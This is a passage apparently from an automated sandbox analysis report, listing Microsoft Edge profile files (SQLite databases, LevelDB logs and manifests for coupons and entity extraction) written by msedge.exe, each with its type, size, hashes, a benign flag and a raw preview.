                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:46.194 21c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/10-14:07:46.195 21c0 Recovering log #3.2024/12/10-14:07:46.219 21c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Collections\collectionsSQLite

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 34, database pages 18, cookie 0x19, schema 4, UTF-8, version-valid-for 34
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):73728
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4947385728088827
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:xR94jweGq2L4H7pgNPdQyoDbel9myJrDVb4:f94ZBS4FgNPdPl9myRDVb4
                                                                                                                                                                                                                                                                                                      MD5:29C9AF42D59BA452C914D337F83778D8
                                                                                                                                                                                                                                                                                                      SHA1:0D4075E73B0189BD28D6968499DCFDE5975116CB
                                                                                                                                                                                                                                                                                                      SHA-256:DFDAE22D17235546DAF4200A5920C46B10E0885D9A0BE747D3DE14F432817613
                                                                                                                                                                                                                                                                                                      SHA-512:DB03C53D1CC2AE5E1E7882437730454AC27842FE5211A6DBDBBB5131EB0D607DB5D2F26EADB08CD9BAD90FD93D6E04A2C27361FE5BD1B510467D2E9BAEF90FBE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..."..................................................................."..j....................0...{...h.6.~.%...U........................................................................................................................................................................................................................................................................................................................................................................G...##..Utablecollectionscollections.CREATE TABLE collections ( id LONGVARCHAR PRIMARY KEY, date_created REAL NOT NULL, date_modified REAL NOT NULL, title LONGVARCHAR NOT NULL, position INTEGER NOT NULL, is_syncable INTEGER DEFAULT 1, suggestion_url LONGVARCHAR, suggestion_dismissed INTEGER, suggestion_type INTEGER, thumbnail BLOB, is_custom_thumbnail INTEGER NOT NULL DEFAULT 0, tag LONGVARCHAR, thumbnail_url LONGVARCHAR, is_marked_for_deletion INTEGER)..........tableitemsitems.CREATE TABLE items

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                                                                                                      MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                                                                                                                      SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                                                                                                                      SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                                                                                                                      SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                      MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                      SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                      SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                      SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):634858
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.015691041468973
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:EfC7zTsosGXbkcnRXFrshHk0rZkYVTeV89XYr3UHNboOqQnd+Nf3nXXodHUeWEv9:Ef4E9cnRXFQK0rZkF8dKOMi0pXiHRX0q
                                                                                                                                                                                                                                                                                                      MD5:F788AA50AF1940237D392739DD2F53B1
                                                                                                                                                                                                                                                                                                      SHA1:7B6C68524813D2072F517195D737CF487FD74F42
                                                                                                                                                                                                                                                                                                      SHA-256:68AEAA7D72793EA6446A5470D4FA057EE6B796ACC7254FB7CAC39728624ED1A7
                                                                                                                                                                                                                                                                                                      SHA-512:3014E93C02E4CAB07926A38B7B6AAB89409AE5212C00A103C4F0DB1921DFED20659913DF6AB7BBF71381277C36524014BF467E61A59A48EC405B5236618AB298
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1l+Vc.................BLOOM_FILTER:..&{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3757764,"primeBases":[5381,5381,5381,5381],"supportedDomains":"FooHhxhbZru6kGIiP/Bhi1iMyyibrdC7FZ0qO+TcCcU6js0cQkxRJ/gfWlEW1aw/rm5ABm+aO1jwklVAS1ggZRJ9W1z8Hk2p0+/GIrP0BokzC9EFOLLYWaUcAXr0IjRl6cVJdHuRVD2tZd5vncH65m9sR1gUk/5kvw0+zxZfPDZ0DsHYwhnAIgZ7GPetaMX01RwPM6c9pgg7oBOwjz4BEQgEUkGmNo13+sCFt+ScXyXld1+EXCdE4SSBdAInjT+jF037vrJ6sb0Spo28djAJUgWyDFBQ1IhXUjXjsai9j6aCMcH2qfoXbNZwqG0djcP43vgomhm1AXUaKyuCXd1tOVpMJ7XqsVI2fS1LGQlnKGvBYGLANmiF086OCFA42ajy/BFRA9nzox5QggWZZBFABF0a1CLnrMKeZkIWlX4/gNU89JEiEswpL+xWUE8XTTZg0TPzPuB7AiR4xX97XHrLaxtKw54XLhM8W21PylQpjXMbZFUP699eYKAkWCqmmQhUR+0BSBy6NbViy81At96NBSQUDjQXjncLaDaSyG1sUxgKTwSfg5Cflr6HTZmNyTERQVZeIzcOdA7PTnEQZIgLtATmv4fDyH5N5/NKHHa02cQ+cVtvELaMxt7wYyp5kfK8W2dttRskQwuLCEPQ67KaeXE1sRzeLI+WJiAImKEYUS8lFSsglewUb1YcdhNzlIRgvwE3yhmCdOA3vQyaijYErox7S6xUxTWEYe0d1XTDgiwxhB16Dm0shiSuEsretNs0V2rskwbNBoAoROYJ4lZUu6LHX7PfZI1fgTQ

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000004.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):142
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.996622661609281
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:nvX38E28xp4m3rscUSWOPeXSglXlf+nETPxpK2x7L8V0jnBFUOfWcF:f38D8xSEsI/GCgl9+n0PxEWO0jnBuO+4
                                                                                                                                                                                                                                                                                                      MD5:66FE34AD489B721FEBE0932815DAB324
                                                                                                                                                                                                                                                                                                      SHA1:023E2230AD4937CC62DF462C3A50DE1C3BF2F8B9
                                                                                                                                                                                                                                                                                                      SHA-256:6F4FA629198449D54DDFD844BD41FBDEA76F810E9C74DC92BCF3AA3399A806CD
                                                                                                                                                                                                                                                                                                      SHA-512:6FF696BB33365ADA2E27B660E263AEBB1803546729FA3E3ABC436CD9A6E6C7111BDDE4E5BDBB4A9F11CA870FC0C3E1AEE2DE6C3FC99805E07EE28E72C6737037
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:L.#.9................BLOOM_FILTER_EXPIRY_TIME:.1733938907.289357.+C+G................BLOOM_FILTER_LAST_MODIFIED:.Tue, 10 Dec 2024 13:15:31 GMT

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):634833
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.015012816241871
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:EfC7cT5osGxbkHnRLFryhHV0rZUYVTKV8sXYl3UHNbooqQnd+E339XX7dH5eWEvx:Ef4oVHnRLFO/0rZUb8QWOoi04XhHAXa2
                                                                                                                                                                                                                                                                                                      MD5:7A043B499C88417DAA2A334856FFB224
                                                                                                                                                                                                                                                                                                      SHA1:CA277F06887073307841CA94AE3172FA575D60CD
                                                                                                                                                                                                                                                                                                      SHA-256:C30C453876F0C4E8DB1960CBE0280044183C9D7ED9D5D661F3E691391DB86CC1
                                                                                                                                                                                                                                                                                                      SHA-512:7BA5690EF819CAF93417708ED9A2675BB5A4FFA4944B76FEAF58D91B98C402918069FE4358B17C36664C7CD672CA80C06325B015959573F7F649B0F26F2CA19A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:....&BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3757764,"primeBases":[5381,5381,5381,5381],"supportedDomains":"FooHhxhbZru6kGIiP/Bhi1iMyyibrdC7FZ0qO+TcCcU6js0cQkxRJ/gfWlEW1aw/rm5ABm+aO1jwklVAS1ggZRJ9W1z8Hk2p0+/GIrP0BokzC9EFOLLYWaUcAXr0IjRl6cVJdHuRVD2tZd5vncH65m9sR1gUk/5kvw0+zxZfPDZ0DsHYwhnAIgZ7GPetaMX01RwPM6c9pgg7oBOwjz4BEQgEUkGmNo13+sCFt+ScXyXld1+EXCdE4SSBdAInjT+jF037vrJ6sb0Spo28djAJUgWyDFBQ1IhXUjXjsai9j6aCMcH2qfoXbNZwqG0djcP43vgomhm1AXUaKyuCXd1tOVpMJ7XqsVI2fS1LGQlnKGvBYGLANmiF086OCFA42ajy/BFRA9nzox5QggWZZBFABF0a1CLnrMKeZkIWlX4/gNU89JEiEswpL+xWUE8XTTZg0TPzPuB7AiR4xX97XHrLaxtKw54XLhM8W21PylQpjXMbZFUP699eYKAkWCqmmQhUR+0BSBy6NbViy81At96NBSQUDjQXjncLaDaSyG1sUxgKTwSfg5Cflr6HTZmNyTERQVZeIzcOdA7PTnEQZIgLtATmv4fDyH5N5/NKHHa02cQ+cVtvELaMxt7wYyp5kfK8W2dttRskQwuLCEPQ67KaeXE1sRzeLI+WJiAImKEYUS8lFSsglewUb1YcdhNzlIRgvwE3yhmCdOA3vQyaijYErox7S6xUxTWEYe0d1XTDgiwxhB16Dm0shiSuEsretNs0V2rskwbNBoAoROYJ4lZUu6LHX7PfZI1fgTQM9b5ynwn8RuiV+AUFhhp5TmE+7IntErw0HqkBRSrhIgl

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):518
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.231198089947043
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:7h3+vLZYebn9GFUt8OXjAW/+OcNV54ZYebn95Z9ptf0TyfHKOM0h:7hMlYeb9ig8OXEWioYeb9zL6TQ1h
                                                                                                                                                                                                                                                                                                      MD5:01BA50A173F7C1AA2A93DB08D18AD9FC
                                                                                                                                                                                                                                                                                                      SHA1:2E8D309E65734124127220B8CECD3FF25E302E48
                                                                                                                                                                                                                                                                                                      SHA-256:972C0BFE2F4CD73918DA9035C312DA13D69FA5C387B8CF06CEEC4407140FAFDF
                                                                                                                                                                                                                                                                                                      SHA-512:E6393432A8E3A00206099F5A533D04A0F24198FF48AC6A1E38438E73CC93AA7498E8D8C939BE7882C2BF36FD7BAE0A391F0CA918D2B241A8946CD6726CC0B012
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:31.536 1bec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/10-12:41:31.628 1bec Recovering log #3.2024/12/10-12:41:31.629 1bec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/10-12:41:47.341 192c Level-0 table #5: started.2024/12/10-12:41:47.395 192c Level-0 table #5: 634833 bytes OK.2024/12/10-12:41:47.399 192c Delete type=0 #3.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):518
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.231198089947043
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:7h3+vLZYebn9GFUt8OXjAW/+OcNV54ZYebn95Z9ptf0TyfHKOM0h:7hMlYeb9ig8OXEWioYeb9zL6TQ1h
                                                                                                                                                                                                                                                                                                      MD5:01BA50A173F7C1AA2A93DB08D18AD9FC
                                                                                                                                                                                                                                                                                                      SHA1:2E8D309E65734124127220B8CECD3FF25E302E48
                                                                                                                                                                                                                                                                                                      SHA-256:972C0BFE2F4CD73918DA9035C312DA13D69FA5C387B8CF06CEEC4407140FAFDF
                                                                                                                                                                                                                                                                                                      SHA-512:E6393432A8E3A00206099F5A533D04A0F24198FF48AC6A1E38438E73CC93AA7498E8D8C939BE7882C2BF36FD7BAE0A391F0CA918D2B241A8946CD6726CC0B012
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:31.536 1bec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/10-12:41:31.628 1bec Recovering log #3.2024/12/10-12:41:31.629 1bec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/10-12:41:47.341 192c Level-0 table #5: started.2024/12/10-12:41:47.395 192c Level-0 table #5: 634833 bytes OK.2024/12/10-12:41:47.399 192c Delete type=0 #3.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):103
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.248480538985685
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjGIOhinx6+qTxFxN3erkEtl:scoBY7jZNxDqTxFDkHl
                                                                                                                                                                                                                                                                                                      MD5:42E7C651FA9CFE891D084F7A327ED9AF
                                                                                                                                                                                                                                                                                                      SHA1:BF44DA5B3F89998DC693EE624C75DB1A56BFFF49
                                                                                                                                                                                                                                                                                                      SHA-256:D3AF6DD512ADB5AAAB05A3B4A54908614D20103A03A61AF90F8409176FFDFF93
                                                                                                                                                                                                                                                                                                      SHA-512:52CE8419D90C9836B270F53BC3B636D7EF158FCD3681B19517103D9240D2ADDC1F84293563F2FF5E7AB39A68A8FE0E4DD9860FDD04C120E89A7753CD385CE90C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......@.p:7...............&.BLOOM_FILTER:.........DB_VERSION........

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6130756249169571
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jDdh6vCphdhGmL:TO8D4jJ/6Up+FhaehD
                                                                                                                                                                                                                                                                                                      MD5:41430B0C4EDA19711978A9E0E91E4ABD
                                                                                                                                                                                                                                                                                                      SHA1:7FB9499C3EBB236B69157F5292D79204B5D4DA14
                                                                                                                                                                                                                                                                                                      SHA-256:1F05C8FDB89FFA088B1BA6115E5A80335E9710CB9BB9CDF242EBBA821C64A96B
                                                                                                                                                                                                                                                                                                      SHA-512:5A8B5DD0DD3CF561212E0E3C45932C9703D78C016A53D6E29BCE6D9B1A49C222C38BC3018FC263898625F9C1830CE7FBEB74B087969A7F12EF2470F7D951142C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):375520
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.354101428089052
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:tA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:tFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                      MD5:EA2AA37EE1905C776317C6CD84BB0762
                                                                                                                                                                                                                                                                                                      SHA1:ADA8AEB2ED856BC2F16247480CE5349B323942E7
                                                                                                                                                                                                                                                                                                      SHA-256:34879C2566E074A8A9D473CCE3BADD413B3A43A69CA4C3940BAD3D8571810768
                                                                                                                                                                                                                                                                                                      SHA-512:E7F169C85ABBFD206C39C4F068262E4E984C4B6D41C9F035AF1E8B013DD3D4A4BC98363A1C9CC7DFFCA478E2EF15A91E8D554D4A4F664E48E9BCB2D133A40BD1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1.g.Tq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13378331270920472..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):317
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1830464903239735
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7i0M1cNwi23oH+Tcwtk2WwnvB2KLlp3Cq2PcNwi23oH+Tcwtk2WwnvIFUv:7i02ZYebkxwnvFLTSvLZYebkxwnQFUv
                                                                                                                                                                                                                                                                                                      MD5:445C6E777C19A39B5A3CC79BCCC82FF3
                                                                                                                                                                                                                                                                                                      SHA1:76BD0356B8F08DE58EB0288C7A5D70B40C7D7D91
                                                                                                                                                                                                                                                                                                      SHA-256:C8656100EB1A74C7A6A69F90E3CC64808E4848BA3C5C00DF8D2C5DA422FC1D13
                                                                                                                                                                                                                                                                                                      SHA-512:D09DE34C511F41BE5DD0BA0FA14F5F50520448272B5F388F6C98B69EFABE8976176AB5CD644823B7F234B11EDE5C5D11F0CFADB2B95ED17994EEB1CA04F5E1AC
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:46.606 2334 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/10-14:07:47.453 2334 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
